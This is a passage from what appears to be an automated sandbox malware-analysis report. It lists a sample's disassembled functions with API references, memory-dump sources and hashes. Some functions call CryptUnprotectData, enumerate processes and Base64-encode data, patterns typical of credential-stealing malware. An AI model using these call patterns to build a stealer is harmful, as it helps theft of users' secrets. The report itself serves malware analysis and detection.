                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 0F`!$8J:^$8J:^$=p{$AePu
                          • API String ID: 0-1857693422
                          • Opcode ID: 1de96879eb41546d5bbbb5d9ec87006d11674d85b92f50f7aa082b846812b877
                          • Instruction ID: 201ea51f66ee51bf1edc9e3659aefd71dc998759f7ffcda6323adebaee347307
                          • Opcode Fuzzy Hash: 1de96879eb41546d5bbbb5d9ec87006d11674d85b92f50f7aa082b846812b877
                          • Instruction Fuzzy Hash: D4B2F7F360C2009FE3046E29EC8567AFBE9EFD4720F16893DEAC487744EA3558458697
                          Function 00707750 Relevance: 7.6, APIs: 5, Instructions: 52memoryencryptionCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0070775E
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00707765
                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 0070778D
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 007077AD
                          • LocalFree.KERNEL32(?), ref: 007077B7
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                          • String ID:
                          • API String ID: 2609814428-0
                          • Opcode ID: e2053eb4cc0a1e7000b262d3710638e61632e694a4a472af3593d09eb9c86e18
                          • Instruction ID: e4eaa7c1291489dd269cc93376281a446fc2a06eb0b4c881b17e07ad1c9ac5f8
                          • Opcode Fuzzy Hash: e2053eb4cc0a1e7000b262d3710638e61632e694a4a472af3593d09eb9c86e18
                          • Instruction Fuzzy Hash: 39011E75B54318BBEB14DB949C4AFAA7B78EB44B11F104155FA09EA2C0D6B0A900CB90
                          Function 00AB1BE9 Relevance: 6.6, Strings: 4, Instructions: 1618COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: F r$Fm?$G7{$RGu
                          • API String ID: 0-4260231220
                          • Opcode ID: 77de35790c917a96296f3414881d902e7a6ce72fd94b2ae71fb6fc9661e187ab
                          • Instruction ID: aca61107ae45aa0b65272c71e0bf059b98ce059e1a5fd7b8e5d8c01d6f5d40a7
                          • Opcode Fuzzy Hash: 77de35790c917a96296f3414881d902e7a6ce72fd94b2ae71fb6fc9661e187ab
                          • Instruction Fuzzy Hash: 78B23BF3A0C2149FE3046E2DEC8567AFBE9EF94720F1A4A3DEAC4C3744E57558058692
                          Function 00ABA3AF Relevance: 6.5, Strings: 4, Instructions: 1540COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: !1/7$2gO>$:q+O$_Fz
                          • API String ID: 0-2975419313
                          • Opcode ID: 9e0a00b3494b63cd8b13afb4bcc701142a2429e6af46c1392a9fbc9641f4827a
                          • Instruction ID: 72fccdd15c729190257cebc080058b4698f0c39d7d1a86bf9c5f66f5c87447eb
                          • Opcode Fuzzy Hash: 9e0a00b3494b63cd8b13afb4bcc701142a2429e6af46c1392a9fbc9641f4827a
                          • Instruction Fuzzy Hash: B1A2F5F36082009FE704AE2DDC8577ABBE9EF94720F1A493DE6C4C7744EA3598418697
                          Function 00723A50 Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 007271E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 007271FE
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00723A96
                          • Process32First.KERNEL32(00000000,00000128), ref: 00723AA9
                          • Process32Next.KERNEL32(00000000,00000128), ref: 00723ABF
                            • Part of subcall function 00727310: lstrlen.KERNEL32(------,00705BEB), ref: 0072731B
                            • Part of subcall function 00727310: lstrcpy.KERNEL32(00000000), ref: 0072733F
                            • Part of subcall function 00727310: lstrcat.KERNEL32(?,------), ref: 00727349
                            • Part of subcall function 00727280: lstrcpy.KERNEL32(00000000), ref: 007272AE
                          • CloseHandle.KERNEL32(00000000), ref: 00723BF7
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                          • String ID:
                          • API String ID: 1066202413-0
                          • Opcode ID: 1c614bf1e955150f0f24067328a9a43d302d33188a8791ff99a9367d4b5b4682
                          • Instruction ID: e5480839f45504b60500baaad477414b417d5ddbcce03be42454616cc812c8b3
                          • Opcode Fuzzy Hash: 1c614bf1e955150f0f24067328a9a43d302d33188a8791ff99a9367d4b5b4682
                          • Instruction Fuzzy Hash: 9E810770904224CFD714CF18E988B95B7F1FB44325F29C1A9D409AB2A2D77E9D82DF90
                          Function 0070EA30 Relevance: 6.1, APIs: 4, Instructions: 98stringencryptionCOMMON
                          Download Yara Rule
                          APIs
                          • lstrlen.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 0070EA76
                          • CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 0070EA7E
                          • lstrcat.KERNEL32(0072CFEC,0072CFEC), ref: 0070EB27
                          • lstrcat.KERNEL32(0072CFEC,0072CFEC), ref: 0070EB49
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$BinaryCryptStringlstrlen
                          • String ID:
                          • API String ID: 189259977-0
                          • Opcode ID: c757dc01f5fbbf7bca1783b9cc4223c995624957dfef6debbd4d83f28d63dad7
                          • Instruction ID: 9f07c6b451e4d7fcde7788b513ea5f142da4ac94735bdaead8dc066fd9336de2
                          • Opcode Fuzzy Hash: c757dc01f5fbbf7bca1783b9cc4223c995624957dfef6debbd4d83f28d63dad7
                          • Instruction Fuzzy Hash: 7A31C4B6A14219ABDB10DB58EC45FEFB77EDF44705F0441A5FA09E2280DBB45A04CFA1
                          Function 007240B0 Relevance: 6.0, APIs: 4, Instructions: 50memoryencryptionCOMMON
                          Download Yara Rule
                          APIs
                          • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,?), ref: 007240CD
                          • GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 007240DC
                          • RtlAllocateHeap.NTDLL(00000000), ref: 007240E3
                          • CryptBinaryToStringA.CRYPT32(?,?,40000001,?,?,?,?,?,?), ref: 00724113
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: BinaryCryptHeapString$AllocateProcess
                          • String ID:
                          • API String ID: 3825993179-0
                          • Opcode ID: 395cb00d3c9434ebe14b72b9b4ca46a7200d5c7d01d975eb5c814cb4656abedb
                          • Instruction ID: 07b4872c41f7aee6b008ffde4b81d750c33082e52586161d5d366e13f1bf00d5
                          • Opcode Fuzzy Hash: 395cb00d3c9434ebe14b72b9b4ca46a7200d5c7d01d975eb5c814cb4656abedb
                          • Instruction Fuzzy Hash: 69011E70604215ABDB209FA5EC85B6B7BADEF45311F108199BD0987240DA719940DF54
                          Function 00722B60 Relevance: 6.0, APIs: 4, Instructions: 48memorytimeCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,?,00000000,0072A3D0,000000FF), ref: 00722B8F
                          • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 00722B96
                          • GetLocalTime.KERNEL32(?,?,00000000,0072A3D0,000000FF), ref: 00722BA2
                          • wsprintfA.USER32 ref: 00722BCE
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateLocalProcessTimewsprintf
                          • String ID:
                          • API String ID: 377395780-0
                          • Opcode ID: cfc6781956897d2c943d5d2a59227975dd3fc4fb063ced5d3d649db9d913fcde
                          • Instruction ID: 498fc0f241be93343c8011d8601606482363ffa02b2882ce28577c30562e8bdc
                          • Opcode Fuzzy Hash: cfc6781956897d2c943d5d2a59227975dd3fc4fb063ced5d3d649db9d913fcde
                          • Instruction Fuzzy Hash: 600156B2918524ABC7149BC9DD45FBFB7BCFB4CB11F00011AF645A2280E7B85540D7B1
                          Function 00709B20 Relevance: 6.0, APIs: 4, Instructions: 42encryptionmemoryCOMMON
                          Download Yara Rule
                          APIs
                          • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00709B3B
                          • LocalAlloc.KERNEL32(00000040,00000000), ref: 00709B4A
                          • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00709B61
                          • LocalFree.KERNEL32 ref: 00709B70
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: BinaryCryptLocalString$AllocFree
                          • String ID:
                          • API String ID: 4291131564-0
                          • Opcode ID: 601629d76147d280ac10a5d44f63cad3a82643e6de1a7b7871ea0290fa8f33c9
                          • Instruction ID: e933f02914a2b8ce978e15ac1f11198fc9e13afc5f1904c7f6a00ddc470293fb
                          • Opcode Fuzzy Hash: 601629d76147d280ac10a5d44f63cad3a82643e6de1a7b7871ea0290fa8f33c9
                          • Instruction Fuzzy Hash: 97F0BDB0358312ABE7305F69AC49F567BA8EF04B61F240514FA45EA2D0D7B4D840DAA4
                          Function 00ABBD2A Relevance: 5.4, Strings: 3, Instructions: 1611COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: J$o$O{s$krm
                          • API String ID: 0-2167230457
                          • Opcode ID: f2d454353a07bf8065f6ff06cbb5c18f3f8fe991dc3fa6da1d7c9280e178700c
                          • Instruction ID: 50cea8a8981dfdf2ccc3d210d2aebaad2df02b0ee5f6698c940fe6e2a51474ad
                          • Opcode Fuzzy Hash: f2d454353a07bf8065f6ff06cbb5c18f3f8fe991dc3fa6da1d7c9280e178700c
                          • Instruction Fuzzy Hash: 28B227F3A0C2149FE304AE2DEC8576ABBE9EF94720F1A453DEAC4C3744E53599048697
                          Function 00AB6D9B Relevance: 5.4, Strings: 3, Instructions: 1601COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
